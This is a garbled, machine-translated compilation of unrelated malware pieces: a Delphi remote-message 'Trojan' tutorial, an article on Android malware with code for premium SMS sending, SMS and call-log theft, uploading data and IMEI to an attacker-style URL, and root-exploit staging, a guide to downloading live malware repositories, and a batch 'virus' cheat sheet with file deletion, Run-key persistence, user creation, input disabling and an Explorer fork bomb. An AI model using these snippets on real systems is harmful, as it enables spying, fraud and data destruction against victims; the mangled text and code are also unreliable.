If you are interested to see how the "Server-Client program" is written and how they work on a real example, I propose to read the post to the end. It will be interesting!

Example program I decided to write on Delphi! Since it is easier and well suited for a small, but real example. As for the Terrible Word "" which I mentioned above, then, it really happens, the most real Troyan, but with small and harmless functionality.

You will learn how the principle is written " "And how they work from the inside! But, there is one "but" troyans do not write, as it will be described below. Since in our example, " Server"Part of the program will weigh a lot ( This is not acceptable for real Trojan), And we will not hide it in the system. In real, "malware" things are a little different.

The server part of the program is trying to develop with a small size, well, approximately "100 KB" plus - minus how many KB. And hide her in the system, so that you have to look for a long time! ...

But everything is smooth, the principle of development is one! And this example is ideal for understanding how I work on the "Server-Client" principle, we simply do not have the right tone of the development of Trojan, and we need it? Right. NOT!!! We are good guys and not going to hooligan!

How to work on the "Server - Client" principle

Simply and in two words, the picture looks like this: you run on your computer " Customer"Part of the program, as a rule, it has a" GUI "that is, the user interface (if the client is not console)

On the computer to which you want access, starts " Server»Part of the program, it also opens a certain port on someone else's computer and is not visible in the system.

Through this port, connections are connected, you in the client specify the port and computer iPadress, on which the server is running, connect to the server and you can safely perform some actions on someone else's PC from your computer! You can still read my last post and find out:

I hope that explained here, it seems to be understandable and a simple human language! If something is not clear, then, on example, everything will become clear! Next, let's decide which actions will be performed on a remote PC due to the work of our little Trojan!

What functionality in this example of the program server is a client.

To be honest, at this stage, when I thought that I would somehow dream and not how I could not come up with something interesting! In general, let it be a functionality from one possibility and up to bump simple:

- The user will receive your message.

I do not see the point of adding some other features. Since I think that for an example and understanding of this is quite enough. Also, I think, you should not write a lot of code, the fact that is below, the same is enough to look at the program from the inside!

And for the place a message can be anything, depends on the fantasy of a person who decided to write a Trojan and from his knowledge in programming.

Well, we will have such a joke! Man sitting at a computer will suddenly receive a message, for example

« Hi, I'm a fucking for your computer»

represent a person's reaction? I think it's funny, it would be to see his facial expression !!!

Development of the Program on the "Server - Client" principle

Start your most interesting! And we will start with the development of the " Server"After that we will write a client under it! I will not explain the program code, simply, I will give examples, yet I do not have a programming blog, and the goal of the post show the phased process of developing such programs by type "Server - Client"

Server Development!

Initially, you need to teach the "server" to open some port on your computer, in order to be able to connect to it from the "client" and after you teach the teams and perform some actions on the PC.

We will open the port as follows, which is simple to pain:

Delphi / Pascal

procedure TForm1.Formcreate (Sender: Togject); Begin Serversocket1.Port: \u003d 666; Serversocket1.Active: \u003d True; end;

Now, if you run the program simply, an empty window without any buttons and other elements. And most importantly, the port will be opened on the computer with the number "666" that this port will later send commands to the server, and in turn it will process them.

In the meantime, make sure that the server works and the port is open, remember the Netstat command and see the result.

As we can see on the computer, as a result of the launch of our program, the port with the number "666" really is opened only by the rim, the program works, and it's time to teach " Server»Take a message.

Delphi / Pascal

procedure TFORM1.Serversocket1Clientread (Sender: Togject; Socket: Tcustomwinsocket); Var Komm: String; Begin Komm: \u003d Socket.ReceiveText; If Copy (Komm, 1,12) \u003d "Message_Text" Then Begin Delete (Komm, 1, 12); ShowMessage (komm); end; end;

The following things are the following! If the server comes with the name "Message_Text" ( The name can be any) then the "ShowMessage" procedure will work and show a message that came with the command and stored in the Komm string variable

Accordingly, the text message will be typed in " Client"And he can be any content!

In other matters, on this development " Server"Parts are completed. As a result, we got a file " Server.exe."And while I will postpone him aside until then you don't write" Client»

Customer development!

We will have a client for obvious reasons with a graphical user interface (GUI) and must have controls, buttons and input fields. I got this kind of program:

Decide with all the elements! Although they are so understood, as they say, just in case I will explain.

— IP.: Fields for entering the iPComature, where the server is running.
— Port.: Indicate the port number on which the server hangs.
- Connect: Button for connecting to server.
- Text message: Input field message you want to send.
- Send a message…: Respectively button to send a message.
- Connection status: Here we will find out, connected or not!

Delphi / Pascal

procedure TFORM1.Button1Click (Sender: Togject); begin clientsocket.host:\u003d ip.text; Clientsocket.port: \u003d StrToint (port.text); Clientsocket.open; end;

You can already right now, run the program, and try to connect to " Server"But we do not recognize the result, connected or not. Before checking, correct this and teach the program to show the result of the connection.

Delphi / Pascal

procedure TForm1.ClientSocketConnect (Sender: Togject; Socket: Tcustomwinsocket); begin label4.caption: \u003d ("managed to connect to:" + ip.text); Label4.font.color: \u003d CLGREEN; end;

And in case, all currents failed to connect to the server, for example, because Server"On the remote PC is not launched and, respectively, the port" 666 "is closed.

Delphi / Pascal

Procedure TForm1.ClientSocketerror (Sender: TEBJECT; Socket: Tcustomwinsocket; Errorevent: Terrorevent; VAR ErrorCode: Integer); Begin If errorcode \u003d 10061 Then Begin Clientsocket.Active: \u003d false; Label4.font.color: \u003d CLRED; Label4.caption: \u003d ("Fauluspillpod-conneuines:" + ip.text); ErrorCode: \u003d 0; end; end;

Now we look at how the program works. To begin with, you launch the client, but do not run the server to check whether it will be displayed that it will be connected, failed.

In the collection of malicious Android applications, some antivirus laboratories have already contained more than 10 million samples. This figure excites imagination, but about 9 million 995 thousand of them are renamed copies of original viruses. But if you analyze the source code of the remaining several thousand Malvari samples, then it can be noted that all of them are combined from a small number of unique functional blocks (several modified and differently combined).

The thing is that the virmerikers most often pursue very trivial tasks:

• send Esemis to a paid number;
• take possession of user confidential information (telephone numbers, message texts, data from an SD card and so on);
• collect data on an infected device;
• take possession of administrative rights on the device (to install applications without permission from the owner or for malicious removal of the device);
• track logins, passwords and payment card data that the user enters on Internet banking systems. How do they do it? Let's try to penetrate into the gloomy world of mobile virmeking and see what is happening there.

Sending SMS.

Who uses:

• Adsms;
• FakePlayer;
• Hipposms.

The most common type of viruses are SMS Troyans. These viruses simply send messages to paid rooms without user consent. Create such a program or rewrite the necessary number is completely easy. And the process of obtaining benefits is extremely simplified - in contrast, for example, from tracking bank data.

The following is the simplest example of the code. This is an elementary SMS sending function. It can be complicated by checking the status of sending, the choice of numbers depending on the position of the subscriber's position and the subsequent removal of SMS.

Private Static Sendsms (String Destnumber, String SMSTEXT) (// Attempt to start the SMSManager SendTextMessage method (standard program to send SMS from the current device) with a minimum parameter number: Recipient number and TRY Message Text (SMSManager.getDefault (). SendTextMessage (Destnumber , NULL, SMSTEXT, NULL, NULL); RETURN TRUE;))

Where to look for a virus code

In the absolute majority of cases, the phone infection occurs through the installation of applications. Any Android application exists in the form of a file with an APK extension, which is essentially an archive. You can view its contents using Android SDK, the APK file converter in JAR and the Java-byte-code decompiler. An application assembly (APK) consists of the following parts:

• resources.arsc - resource table;
• res (Folder) - Actually Resources (Icons and Other);
• Meta-Inf (folder) - contains files with the following contents: Resource checksum, application certificate and Apk assembly description;
• AndroidManifest.xml - all kinds of service information. Including permission (permission), which the application requests before installing for its correct operation;
• classes.dex - You probably heard that in Android operating systems, the entire code is performed using Dalvik Virtual Machine (from version 4.4. ART support appears), which does not understand the usual Java-byte code. Therefore, there are files with the DEX extension. It, along with the necessary and useful classes (which are responsible for the functionality of the application), also contains malicious (viral code that we understand in this article).

Recording user information in a text file

Who uses:

• Nickyspy;
• SMSSPY.

There is a category of viruses that hunts for personal user data. The mechanism of their action is also easy. They are either loaded to the server of their creator the user files, or pre-collect any data in TXT (CSV, XML - not fundamentally). Interest for attackers can represent contacts of any type, messages from different messengers, media files and so on.

SMS contaminated users are especially valuable by telephones and recipients phone numbers - they can be replenished with a base for spam mail. Less frequently viruses of this kind are used to infect devices of specific personalities - the next time your girl will suggest you to test the written (ah, caramba! - approx. Ed.) An application on Android, do not lose vigilance :).

// We consider the number of SMS on the ArrayofObject \u003d (Object) device) LocalBundle.get ("PDUS"); int j \u003d arrayofobject.length; // Go around the cycle each SMS i \u003d 1 While (true) (if (i\u003e \u003d j) break; // Create an SMS message SMSMESSAGE LocalsmsMessage \u003d SMSMESSAGE.CREATEFROMPDU ((BYTE) ArrayofObject [i]); // put in string variables sender's number, text and time of sending SMS String MessageNumber \u003d localSmsMessage.getOriginatingAddress (); String MessageText \u003d localSmsMessage.getDisplayMessageBody (); long l \u003d localSmsMessage.getTimestampMillis (); Date localDate \u003d new Date (l); String MessageTimeDate \u003d New SimpleDateFormat ("YYYY-MM-DD HH: MM: SS"). Format (LocalDate); // Forming the line from the received data and write it to the text file by the WRITEREC STRING MessageInfo \u003d 7MessageNumber + "#" "+ MessageText +" # " + MessageTimeDate + ";" WRITEREC (ParamaContext, "SMS.txt", MessageInfo); // Go to the next message I + \u003d 1;) Also spambling is conveniently replenished from the history of the subscriber's calls. This code can be started with an incoming call: if (parmintent.getaction (). Equals ("Android.Intent.Action.New_outGoing_Call")) (// put in the variable number of the subscriber's STRING PHONENUMBER \u003d Paramintent.getStringextra ("android.intent. Extra.Phone_Number "); // We form a string from the number and the date of the ring String PhoneCallRecord \u003d PhoneNumber +" # "+ GetSystemTime (); // call the WRITEREC () method (its code is not given here), which adds a string to a text file with WRITEREC Call History (ParamaContext, "PhoneCall.txt", PhoneCallRecord);)

After the information is recorded, it is recreated into the "necessary hands". The code below loads the call history to the server:

Private Void UploadPhoneCallHistory () Throws Idexception (WHILE (TRUE) (RETURN; // Checking if you need if you need if (! Fileisexists (/data/data/spyapp.pg/files/phonecall.txt ")) Continue; // Create an object - download files UploadFiles LocaluploadFiles \u003d New uploadfiles (); String UploadKeyNode \u003d GetKeyNode ("UID", "UID_V"); // Run the method .AdvancedupLoadFile (its code is not given here) To download the file to the VirusCeter Server LocaluploadFiles. AdvancedupLoadFile (UploadKeynode, "/ Data / Data / Spyapp.pg / Files / PhoneCall.txt");))

Collection of information

Who uses:

• DROIDKUNGFU;
• DroidDream;
• the vast majority of Malvari all similar.

In principle, any virus meker useful information about the devices infected with its programs. Get it very simple. An array of data on the properties of the phone is created (their full list can be viewed in the Android-developer manual) and sent by the POST request to the PHP script (the language is not specific) on the attacker server, the data processes and places them in the database for later use.

Private Void ReportState (Int Paramint, String Paramstring) (// Create an array and put the service information about ArrayList UserInformation \u003d New ArrayList (); UserInformation.add (new basicnamevaluepair ("IMEI", this.mimei); userinformation.add ( New BasicNameValuePair ("Taskid", this.mtaskid)); userinformation.add ("state", integer.tostring (paramint))); // If the function defines the parameter "ParamString", put in an array And his if (paramstrng! \u003d NULL) && (! "." Equals (ParamString))) UserInformation.add ("Comment", ParamString); // Create an HTTP POST query with a script address, which collects HTTPPOST LocalHttpost \u003d New Httppost ("http://search.virusxxxdomain.com:8511/search/rtpy.php"); try (// Add our array to the request with data and perform it using the standard HTTP client LocalHttpost.setentity (New UrlencodeForMentity (UserInformation, UTF-8))); new defaulthttpclient (). EXECUTE (LocalHttpPost) .getstatusline.getstatuscode (); Return; ))

Routing

Who uses:

• DROIDKUNGFU;
• DroidDream;
• Rootsmart.

One of the most unpleasant things that can happen to the Android device is its routing virus. After all, after that, the malicious program can do anything with it: to install other viruses, change the settings of the hardware. This is done by a consistent launch of exploits:

Private Void Rootfunc () (ApplicationInfo LocalapplicationInfo \u003d GetApplicationInfo (); / * "RATC" is a copy of the famous Root-exploit Rage Against The Cage. KIALL - stop all the processes running by the current application. GJSVRO - Explant for purchasing UDEV rights (used in Linux systems for enhanced hardware and network interfaces). All this is copied to the desired location * / utils.copyassets (this, "RATC", "/ DATA / DATA" + LocalapplicationInfo.packageName + "/ RATC"); Utils .copyassets (this, "killall", "/ data / data" + localapplicationinfo.packagename + "/ killall"); utils.copyassets (this, "gjsvro", "/ data / data" + localapplicationinfo.packagename + "/ gjsvro "); // and run using the utils.oldrun (" / System / Bin / Chmod "," 4755 /Data/Data"+localapplicationInfo.packagename + "/ RATC"); Utils.oldrun ("/ System / bin / chmod, "4755 /data/data"+localapplicationinfo.packagename +" / killall "); utils.oldrun (" / System / Bin / Chmod "," 4755 /data/data"+localapplicationinfo.packag ENAME + "/ GJSVRO"); new mytread.start (); )

Sites about Malvari

Kasperskiy Lab expert blog This resource contains high-quality and detailed articles about many aspects of computer security, including Android viruses. It is necessary to regularly visit this site to keep abreast of the latest events.

The group is dedicated to the Open Source tool for all sorts of manipulations with the Android application code (decompilation and modification of DEX / ODEX / APK files and so on). Androguard also contains an extensive base of articles about viruses. In addition to the short reviews of functionality and protection methods, detailed analyzes of Malvari Code are found.

Section Mobile Threats on www.fortiguard.com Encyclopedia of telephone viruses. Each article is an overview of the functionality, seasoned by a significant number of technical details. In addition to the information about threats for the Android operating system, there are articles and about viruses for Symbian OS, IOS and other platforms.

Protection against viruses

Some users believe that if you download applications exclusively from Google Play and install antivirus on your smartphone, it will absolutely guarantees security. It is not necessary to dedicated: the network regularly appear messages about finding Malvari in the official market. And the number of newly emerging malicious programs is measured by hundreds of thousands per month, which makes it difficult to get into the database of antivirus programs. A real security guarantee can give manual view of the APK file code before installing it on the phone. No need to be a coding gurus to notice malicious fragments. And our article will help you with this.

Conclusion

As we see from examples, mobile virveying technological complexity is no different. Of course, these examples are simplified under the format of the magazine - first of all, error handlers and exception handlers are missed, as well as individual technical trivia, the absence of which will not prevent you from understanding the principles of work of Android-Malvari, but will protect them from unnecessary experiments. After all, we do not support the creation of viruses, isn't it? 🙂

Where to download samples of viruses with source code and detailed description?

Find a collection of actual viruses, and even more so with the description and source code, this is not easy task. We have already told where to analyze and study. Today I will tell you another source on which you can find and download but this time not just a small car found on the network, but executive files and Sources of viruses with detailed information.

In this article, you will learn about a couple of interesting projects that are offered to plunge into the world of the original code of all sorts of trojans, botnets, stillers, worms, etc.

• Preface
• Sources of viruses
• Thezoo project
• Project Malware.

Why and who may be needed samples of viruses?

The executable files and sources of viruses may be needed to analyze the technologies used by malware, to study the behavior of viruses in the system (monitoring the file system, processes,) and testing antiviruses. Employees of anti-virus companies are ready to pay money to obtain sources of a new virus.

Is it legally downloading viruses?

You can download virus samples to study and analyze on your computer, but to distribute and infect them from others - it is impossible. More information about this in Article 273 of the Criminal Code.

The goal of these projects is to give antivirus companies and people interested in viruses analysis, to understand the malicious Code of Malvari.

Attention! Keep in mind that the downloaded files are working viruses. Some of them will try to infect your computer. In no case do not start the downloaded files on the main computer. I also do not recommend downloading viruse samples without any special knowledge of malware analysis.

In any case, the site www.Site does not bear any responsibility for any harm to your own and foreign computers.

I strongly recommend using. Do not forget about malicious worms that will try to spread and run out of the virtual machine. To avoid this, I advise you to disable all guest add-on virtual machines, network access, etc. How to do this you can learn from the reference above.

Sources of viruses: Thezoo project

Let's start the review from the project Thezoo, which is translated as a zoo (with humor of authors everything is fine). It is located in the Githab repository.

The goal of the project make an accessible to the study of viruses. The authors collect and update the viruses database. With Thezoo, you can access popular malware samples.

To download and study, both executable file and sources are offered.

How to use thezoo?

You can use thezoo project in different ways: right from the site or using a framework. We will look at both ways. Let's start with the first.

So, go to the site and see several directories and files.

Performed virus files Located in the catalog:

thezoo / Malwares / Binaries /

In it you will find an executable virus file. For each individual malicious - a separate directory in which 4 files are located: Malicious software itself in encrypted form in the ZIP archive, SHA256 and MD5 - archive checksums for comparison and password for an encrypted archive.

Source code of viruses Located in the catalog:

thezoo / Malwares / Source / Original /

Each directory has four similar files. Still as well as with executable files.

For each individual sample there is a reference, but to use the reference to install the framework.

To install Thezoo framework, we use the command:

git Clone https://github.com/ytisf /thezoo

Requirements: UrLLIB2, Python3

Teams: Search, Use, Get, Info, List All, Report-Mal, Update-DB, EXIT. Read more about commands using the Help command.

So, with this project figured out, now consider one more.

Virus Samples: Malware Project

The Malware project is also located on Githab. The choice of viruses is not as big as in the zoo, but updated more often. Among the small number of harmless programs, it is possible to find the sources of Trojan, botnets, extortioners, password stillers and other "good".

Here is the list to date:

• Alina Spark (Troyan)
• Bleeding Life 2 (Expite Pack)
• Carberp (botnet)
• Carberp (Bank Trojan)
• CRIMEPACK 3.1.3 (exploit Pak)
• Dendroid (Trojan for Android)
• Dexter V2 (Trojan)
• EDA2, Stolich, Win32.Stolich (extortionist)
• Flexispy (Spyware)
• (Framework)
• GMBOT (Android Troyan)
• Gozi-ISFB - (Bank Trojan)
• GRUM (Spam Bot)
• Hacking Team RCS ()
• Hidden Tear (extortionist)
• KINS (Bank Trojan)
• Mirai (botnet internet of things)
• Pony 2.0 (password stumes)
• PowerLoader (botnet)
• Rig Front-End (Explit Pack)
• ROVNIX (Bucket)
• TINBA (Bank Trojan)
• Tinynuke (Bank Trojan)
• Trochilus, Redleaves (Rat)
• Zeus (Bank Trojan)

Let's go to the Alina Trojan folder. Here we offer several directories, among which there are sources. In addition, in the lower part by the authors added links to malicious information.

here is the trial of the team
assoc .exe \u003d .mp3-drunks are launched as Music Label E: PriduroK-changing Screw to idiot Time 00:00 - Time
date 13.03.36-changing the date Assoc .lnk \u003d .txt-changing the shoots in the TCT file Copy% 0 f: \\ work.bat-copying of the object

1) A program to delete files from a flash drive (if that is inserted) and rename it.
del F: \\ *. * / Q
label F: Hack
2) A program to change the date and time on the computer and copy it to the C disk and on the USB flash drive.
time 14:13
date 11.07.12
copy% 0 C: \\ Time.Bat
copy% 0 F: \\ Time.Bat
----------
\u003e nul-hide the string command
% Systemroot% / System32 / Rundll32 user32, swapmousebutton-changing mouse keys
---------------
copy "% 0" "% Systemroot% \\ System32 \\ File.bat»
rEG Add "HKLM \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Run" / V "Filel" / T reg_sz / d "% Systemroot% \\ System32 \\ File.Bat" / F
rEG Add HKCU \\ Software \\ Microsoft \\ Windows \\ Currentversion \\ Policies \\ Explorer / V NocontrolPanel / T Reg_DWORD / D 1 / F
Very brutal command: adds a program to the OS autoload.
"Del X: \\ Y *. * / Q" - will delete all files on the disk x in the (except folder folder) (Example Del F: \\ Data *. * / Q);
"Net User" x "/ add" will add to the user's computer under the name x (example of Net User "smoked" / add);
"@Echo off" introduced at the beginning of our virus and hides everything
rundll32 User, Disableoeemlayer - System failure (!) - Turn off all I / O functions (keyboard, display, mouse). As a result, there will be a black screen with a cursor and no response system, but Windows continues to work.
del *. * / Q (After starting this command, all files besides folders that were in the folder where the virus was launched will be lost !!!
mD 1-creating folders
To start the file while booting Windows, rename the file to AUTOEXEC.BAT
Echo Virus Loading-inscription on screen virus Lodin
del C: Program Files / Q (Deletes all files from this folder)
rEG is direct work with the registry. Watch REG /? All!
rCP - File sharing via RCP in ASCII
runas - on behalf of the user
tasklist - Displays applications and sessions associated with it.
taskKill - Allows you to complete one or more processes
tFTP - Trivial FTP
tskill - kill the process
rEG - interaction utility with registry
bootcfg - setting up boot.ini
appende - allows you to open deleted files as if they are in the current.
getMac - Get Mas
logoff - to complete the user session.
mEM - output to the screen of information about current processes in RAM
mQBKUP - Archiving
netsh - ??
openFiles - View open files.
rSH - executing commands on remote nodes with running RSH
sC - Command Line ??
rexec - executing commands on remote nodes with running Rexec
shutdown - Turn off (Hehe) Local or Remote Computer.
systemInfo - Conclusion Info About Comp.
schtasks - job scheduler.
xcopy - copy files and directories.
tSSHUTDN - termination of the server in the manner.
sET - output, task and removal of CMD.EXE environment variables. System Properties (Ave. "My Comp") - additionally - environment variables. There are not all variables, but a lot! All look just set.
By the way, here are some rundll commands that can be used when creating batch files

rundll32 User, WNETDISCONNECTDIALOG
Window "Disable a network disk" call

rundll32 User, Disableoeemlayer
Failure to see

rundll32 User, Repaintscreen
Refresh (as)

rundll32 User, SetCursorpos
MAUS-CURSOR Left to put

rundll32 Diskcopy, diskcopyrundll
Window "Copy Disk" Call

rundll32 RNAUI.DLL, RNAWIZARD / 1
Dialog "Setting Communication" Call (/ 1 \u003d without window)

rundll32 Shell, Shellexecute
Explorer window Open in the foot directory

rundll32 Shell32, OpenAS_RUNDLL
Window "Open with ..." Call ***

rundll32 Shell32, SHFORMATDRIVE
Window "Foolmatization: Disc3.5 (a)" Call

rundll32 Shell32, Shellabouta
Info-Box (About Windows) Call

rundll32 Shell32, ShexiTWindowsEx 0
Windows 98 Started (without autoexec.bat and dp.)

rundll32 Shell32, ShexiTWindowsEx 1
Work with Windows 98 finish

rundll32 Shell32, ShexiTWindowsEx 2
Windows-98-PC Boot

rundll32 Shell32, ShexiTWindowsEx -1
Windows-98-Explorer Started again

rundll32 Shell32, Control_RUNDLL
Open the Uppress panel window

rundll32 Shell32, Control_RUNDLL DESK.CPL
Open the "Eknaran properties"

rundll32 Shell32, Control_RUNDLL MAIN.CPL
Open modul-panels of the Yppulation from main.cpl **

rundll32 krnl386.exe, exitkernel
exit from Windows without any messages / questions

rundll32 User, SwapmouseButton
"Go" mouse keys *

rundll32 Keyboard, Disable
"Disable" keyImpy *

rundll32 Mouse, Disable
"Disable" mouse *

rundll RNAUI.DLL, RNADial "Propyp"
Call the "Install Communication" window with the name "PPWOP"

rundll32 User, TileChildWindows
fit all the non-cooled windows of the oven down

rundll32 User, CascadeChildWindows
fit all the non-windows cascades

rundll32 sysdm.cpl, installDevice_rundll
(unity. Opportunity in W98) Establish non-plug & Play Boots

rundll32 msprint2.dll, runll_printtestpage
call in the menu that appears in the menu and send it a test

rundll32 User, SetCaretBlinkTime
minister's new kypsup flashing frequency *

rundll32 USER, SETDOUBLECLICKTIME
reinstall the new speed of double pressing *

rundll32 setupx.dll, installhinfsection
DefaultInstall 130; C: \\ File.inf
window "Perezapysk system. Give it now? Kommersant / no b "****

Assoc - Displays or modifies file extensions communication
AT - Plans to execute commands and programs on the computer.
ATTRIB - Displays or changes file attributes.
Break - Sets or cancels the combination check.
CACLS - Displays or modifies access control lists (ACLS) for files.
Call - calls one * .bat file from another.
CD - Displays the name or changes the name of the current directory.
CHCP - Displays or sets the number of the active code page.
CDIR - Displays the name or changes the name of the current directory.
CHKDSK - checks the disk and displays a state report.
CLS - cleans the screen.
CMD - starts a new instance of Windows NT interpreter.
Color - Sets the default colors for the front and rear console.
Command - starts a new copy of the Windows command interpreter.
COMP - compares the contents of two files or installation of files.
Compact - Displays or modifies file compression on Windows NT patricians (NTFS).
Convert - converts FAT volumes to the file system format Windows NT (NTFS). You can not convert the current disk.
Copy - copies one or more files to another place.
CTTY - Changes the terminal device used to manage your system.
Date - Displays or sets the date.
DEL - deletes one or more files.
Debug - executes debugging, testing programs and editing tools.
DIR - Displays a list of files and subdirectory in the directory.
Diskcomp - compares the contents of two diskettes.
DiskCopy - copies the contents of one floppy disk to another.
Doskey - Edits command rows, restores Windows commands and creates a macro.
ECHO - Displays messages, or turns on / off command output.
EMM386 - Enables / disables the support for extended EMM386 memory.
Endlocal - ending the localization of environmental changes in the * .bat file.
Erase - deletes one or more files.
EXIT - stops execution of the program (command interpreter).
Extract is a means of extracting information from CAB files.
FC - compares two files or file installations, and displays the difference between them.
Find - looking for a text string in a file or files.
Findstr - Search for strings in files.
For - executes the specified command for each file in the file set.
Format - formats disk for use with Windows.
FTYPE - Displays or modifies file types used in extension links.
Goto - guides the Windows NT command interpreter to the labeled line in the * .bat file.
GRAFTABL - Windows ability to display pseudographic characters inserted in graphical mode.
Help - provides Help information for Windows commands.
If - performs the processing of the condition in the * .bat file.
KeyB - configures the keyboard for a given language.
Label - Creates, Changes, or removes a torque label on the disk.
LoadHigh (LH) - downloads the program to the upper memory address.
MD - creates a directory.
MEM - displays the amount of and free memory in your system.
Mkdir - creates a directory.
Mode - configures the system device.
More - Displays the output of one screen at a time.
Move - Moves one or more files from one directory to another on the same disk.
NetStat - Displays protocol statistics and current TCP / IP network connections.
NLSFUNC - downloads information specific to the country.
PATH - Displays or sets the search path for executable files.
Pause - suspends the processing of the * .bat file and displays the message.
POPD - restores the previous value of the current directory saved by PUSHD.
Print - prints a text file.
Prompt - changes the prompt to the Windows commands.
PUSHD - Saves the current directory, then changes.
Rd - deletes directory.
Recover - restores readable information from a bad or defective disk.
REM - writes comments (notes) in * .bat files or config.sys.
Ren - renames file or files.
RENAME - Rename the file or files.
REPLACE - replaces files.
Restore - restores files that have been archived using the Backup command.
RMDIR - removes the directory.
SET - Displays, sets or deletes Windows Environment Variables.
SETLOCAL - starts localization of changes in the * .bat file.
SETVER - Sets the MS-DOS version number that Windows reports the program.
SHIFT - shifts the position of the replaceable parameters in the * .bat file.
SmartDRV - Installs and configures the SMART disk caching utility - drive.
SORT - sorts the input stream.
START - starts a separate window to perform the specified program or command.
Subst - connects the path with a platter.
SYS - copies the MS-DOS system files and interpreter commands to the drive you specified.
Time - Displays or sets the system time.
Title - Sets the window header for a session.
Tree - graphically displays the directory structure in the drive or path.
Type - Displays the contents of the text file.
VER - Displays the version of Windows.
Verify - Reports Windows, whether to check the correctness of the file record on the disk.
Vol - Displays a disk volume label and serial number.
Xcopy - copies the files and trees directories.

Well, if you want to "kill" Windows then:
@echo off.
start Explorer.
start Explorer.
start Explorer.
start Explorer - repeat 100 times 100 and prescribe into autoload.